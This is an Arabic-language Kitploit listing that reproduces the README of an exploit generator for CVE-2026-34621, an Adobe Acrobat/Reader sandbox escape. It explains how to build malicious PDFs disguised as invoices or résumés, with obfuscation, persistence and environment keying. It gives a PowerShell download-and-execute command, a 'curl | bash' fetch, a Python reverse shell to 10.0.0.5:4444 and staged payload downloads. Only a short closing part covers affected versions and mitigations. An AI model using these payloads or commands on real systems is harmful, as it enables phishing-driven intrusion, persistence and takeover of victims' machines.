Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve_2026_34621_advanced — مولّد استغلال متطور ومتعدد المنصات لثغرة **CVE-2026-34621** – وهي ثغرة حرجة في تلوث النماذج الأولية (prototype pollution) في Adobe Acrobat وReader تؤدي إلى الهروب من بيئة الحماية (sandbox escape) وتنفيذ تعليمات برمجية عشوائية على أنظمة Windows وmacOS. | Kitploit
أدوات/GitHubGitHub/null200ok/cve_2026_34621_advanced
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

مولّد استغلال متطور ومتعدد المنصات لثغرة **CVE-2026-34621** – وهي ثغرة حرجة في تلوث النماذج الأولية (prototype pollution) في Adobe Acrobat وReader تؤدي إلى الهروب من بيئة الحماية (sandbox escape) وتنفيذ تعليمات برمجية عشوائية على أنظمة Windows وmacOS.

عرض المستودع
135منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مولّد الاستغلال المتقدم CVE-2026-34621

Python 3.7+ License

أداة متطورة ومتعددة المنصات لتوليد استغلال CVE-2026-34621 – ثغرة تلوّث النموذج الأولي (Prototype Pollution) حرجة في Adobe Acrobat وReader تؤدي إلى تجاوز بيئة الحماية (Sandbox) وتنفيذ أوامر عشوائية على أنظمة Windows وmacOS.

⚠️ إخلاء مسؤولية مهم
هذه الأداة مخصصة فقط للبحث الأمني المصرّح به واختبار الاختراق.
الاستخدام غير المصرّح به ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


📋 جدول المحتويات

  • نظرة عامة
  • الميزات
  • التثبيت
  • بدء سريع
  • أمثلة الاستخدام
    • أوامر Windows
    • أوامر macOS
    • اختبار الأجهزة المحمولة
  • خيارات سطر الأوامر
  • كيف يعمل
  • الإصدارات المتأثرة
  • التخفيف
  • المساهمة
  • الترخيص

  • 🔍 نظرة عامة

    CVE-2026-34621 هي ثغرة يوم-الصفر (Zero-Day) في Adobe Acrobat وReader تسمح للمهاجم بـ:

    1. تلويث النموذج الأولي لكائن JavaScript داخل محرك Adobe.
    2. تجاوز بيئة الحماية الأمنية (Sandbox).
    3. تنفيذ أوامر نظام عشوائية على جهاز الضحية.

    يقوم هذا المولّد بإنشاء ملف PDF خبيث، عند فتحه في إصدار ضعيف من Adobe Reader، ينفّذ تلقائيًا حمولة (Payload) مخصصة لنظام تشغيل الضحية.

    منصات الأهداف المدعومة:

    • ✅ Windows (تنفيذ كامل للأكواد العشوائية)
    • ✅ macOS (تنفيذ كامل للأكواد العشوائية)
    • ❌ Android / iOS (غير معرضة للخطر – وضع احتياطي تجريبي فقط)

    ✨ الميزات

    الفئةالقدرات
    حمولات متعددة المنصاتاكتشاف نظام التشغيل تلقائيًا واختيار طريقة تنفيذ الأوامر المناسبة لنظام Windows أو macOS.
    نواقل تنفيذ متعددةcmd.exe، PowerShell، WScript.Shell (Windows) / Terminal.app، osascript (macOS).
    حمولات مرحليةتنزيل وتنفيذ حمولات المرحلة الثانية من عنوان URL بعيد.
    الاستمراريةتثبيت مفتاح تشغيل في السجل (Windows) أو LaunchAgent (macOS).
    تقنيات التهربثلاثة مستويات من تشويش JavaScript، وربط بالبيئة، وتأخير التنفيذ، وأكواد متعددة الأشكال.
    تضمين PDF كطُعمدمج الاستغلال في ملف PDF يبدو شرعيًا (يتطلب PyPDF2).
    مشغلات متعددةOpenAction، إجراء فتح الصفحة، أو JavaScript على مستوى المستند.
    تقارير شاملةتقارير HTML وTXT وJSON تفصّل تكوين الحمولة.

    📦 التثبيت

    1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
    cd CVE-2026-34621-Exploit
    

    2. (اختياري) إنشاء بيئة افتراضية

    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate      # Linux/macOS
    venv\Scripts\activate         # Windows
    

    3. تثبيت التبعيات

    يستخدم السكربت الأساسي مكتبة Python القياسية فقط. لميزة دمج PDF كطُعم، قم بتثبيت PyPDF2:

    root@kitploit:~
    pip install PyPDF2
    

    🚀 بدء سريع

    قم بتوليد ملف PDF أساسي يفتح الآلة الحاسبة على كل من Windows وmacOS:

    root@kitploit:~
    python3 cve_2026_34621_advanced.py -o test.pdf
    

    سيؤدي ذلك إلى إنشاء:

    test.pdf – ملف PDF الخبيث.

    test_report.html – تقرير HTML مفصّل.

    test_report.txt – ملخص نصي عادي.

    test_config.json – تصدير تكوين JSON.

    💻 أمثلة الاستخدام

    أوامر Windows

    1-السيناريو الأمر

    أ-نافذة calc.exe الأساسية

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
    

    صدفة عكسية عبر PowerShell

    root@kitploit:~
    python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
    

    حمولة مرحلية مع استمرارية

    root@kitploit:~
    python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
    

    مربوطة بالبيئة (تعمل فقط على "SALES-PC")

    root@kitploit:~
    python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
    

    مع مستوى تشويش 2 وتأخير 10 ثوانٍ

    root@kitploit:~
    python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
    

    أوامر macOS

    2-السيناريو الأمر

    فتح الآلة الحاسبة

    root@kitploit:~
    python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
    

    تنزيل وتنفيذ سكربت

    root@kitploit:~
    python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
    

    صدفة عكسية عبر Python

    root@kitploit:~
    python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    

    استمرارية عبر LaunchAgent

    root@kitploit:~
    python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
    

    التضمين في ملف PDF كطُعم

    root@kitploit:~
    python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
    

    3-ملاحظة اختبار الأجهزة المحمولة

    يعمل السكربت نفسه على أجهزة سطح المكتب (Windows/macOS/Linux) لتوليد ملف PDF. يمكن فتح ملف PDF المولّد على أجهزة Android أو iOS، ولكن:

    إصدارات Adobe Acrobat Reader المحمولة غير معرضة لثغرة CVE-2026-34621.

    ستقوم الحمولة بتشغيل وضع احتياطي تجريبي غير ضار (فتح عنوان URL أو عرض تنبيه) بدلاً من تنفيذ أوامر النظام.

    📖 خيارات سطر الأوامر

    الخيار الوصف

    -o، --output FILE مطلوب. اسم ملف PDF الناتج.

    --win CMD أمر Windows للتنفيذ (الافتراضي: calc.exe).

    --mac CMD أمر macOS للتنفيذ (الافتراضي: open /System/Applications/Calculator.app).

    --stage URL عنوان URL لتنزيل حمولة المرحلة الثانية منه.

    -p، --persistence تثبيت آلية الاستمرارية (Registry/LanchAgent).

    -O، --obfuscate LEVEL مستوى تشويش JavaScript (0=بدون، 1=أساسي، 2=متوسط، 3=متقدم).

    -d، --delay SECONDS تأخير التنفيذ بالثواني المحددة.

    -k، --key HOSTNAME ربط بالبيئة – التنفيذ فقط على اسم المضيف المطابق.

    -l، --lure PDF مسار ملف PDF شرعي لاستخدامه كطُعم (دمج الاستغلال).

    --trigger TYPE ناقل التشغيل: openaction، pageopen، أو doclevel.

    --no-reports تخطي توليد تقارير HTML/TXT/JSON.

    --seed N تعيين بذرة عشوائية لتوليد متعدد الأشكال قابل للتكرار.

    ⚙️ كيف يعمل

    سلسلة الهجوم

    تلوّث النموذج الأولي:

    يقوم JavaScript المضمّن بتعديل Object.prototype لحقن خصائص خبيثة (__trusted، privileged، إلخ). يؤدي ذلك إلى إرباك حدود الثقة في محرك JavaScript الخاص بـ Adobe.

    تصعيد السياق

    بسبب النموذج الأولي الملوّث، يتعامل المحرك بشكل غير صحيح مع JavaScript غير الموثوق به في المستند كما لو كان يعمل في سياق مميز.

    الوصول إلى واجهات برمجة التطبيقات المميزة

    يمكن للسكربت الآن استدعاء واجهات برمجة تطبيقات مقيدة مثل app.launchURL وutil.readFileIntoStream وapp.trustedFunction.

    تجاوز بيئة الحماية

    تسمح هذه الواجهات بالوصول إلى نظام الملفات وتنفيذ العمليات خارج بيئة حماية Adobe.

    تنفيذ الأكواد العشوائية

    ينفّذ السكربت أمر المهاجم باستخدام طرق خاصة بنظام التشغيل:

    Windows: cmd.exe /c، PowerShell، أو WScript.Shell.

    macOS: معالج عنوان URL الخاص بـ Terminal.app أو osascript.

    مستويات التشويش

    المستوى الوصف

    0 بدون تشويش – JavaScript عادي قابل للقراءة.

    1 تحويل السلاسل النصية إلى String.fromCharCode، وعشوائية أسماء المتغيرات.

    2 المستوى 1 + حقن أكواد ميتة وتعليقات غير مفيدة.

    3 ترميز السكربت بالكامل بـ base64 وتغليفه في eval(atob(...))، ثم إعادة تشويشه.

    🛡️ الإصدارات المتأثرة

    المنتج المسار الإصدارات الضعيفة الإصدار المُصحّح

    Adobe Acrobat DC مستمر ≤ 26.001.21367 26.001.21411

    Adobe Acrobat Reader DC مستمر ≤ 26.001.21367 26.001.21411

    Adobe Acrobat 2024 كلاسيكي ≤ 24.001.30356 24.001.30362 (Windows) / 24.001.30360 (macOS)

    🛠️ التخفيف

    التحديث فورًا: تطبيق أحدث التحديثات الأمنية من Adobe.

    تعطيل JavaScript في Adobe Reader: تحرير ← تفضيلات ← JavaScript ← إلغاء تحديد "تمكين Acrobat JavaScript" (لاحظ أن هذا يعطّل بعض وظائف PDF).

    استخدام عارضات PDF بديلة: فكّر في استخدام المتصفحات أو العارضات التابعة لجهات خارجية غير المتأثرة.

    🤝 المساهمة

    المساهمات مرحّب بها، ولكن يرجى ملاحظة:

    يجب أن تكون جميع طلبات السحب (Pull Requests) لأغراض البحث الدفاعي أو تحسينات الكشف أو تحسينات إعداد التقارير.

    لا نقبل المساهمات التي تزيد من القدرة الهجومية للأداة بما يتجاوز ما هو ضروري للاختبار المشروع.

    للمساهمة:

    قم بعمل Fork للمستودع.

    أنشئ فرع ميزة.

    أرسل طلب سحب مع وصف واضح للتغييرات.

    📄 الترخيص

    هذا المشروع مقدم لأغراض تعليمية واختبار أمني مصرّح به فقط.

    باستخدامك لهذا البرنامج، فإنك توافق على أنك مسؤول عن الامتثال لجميع القوانين واللوائح المعمول بها.

    يتنصل المؤلف من أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

    تنزيل الأداة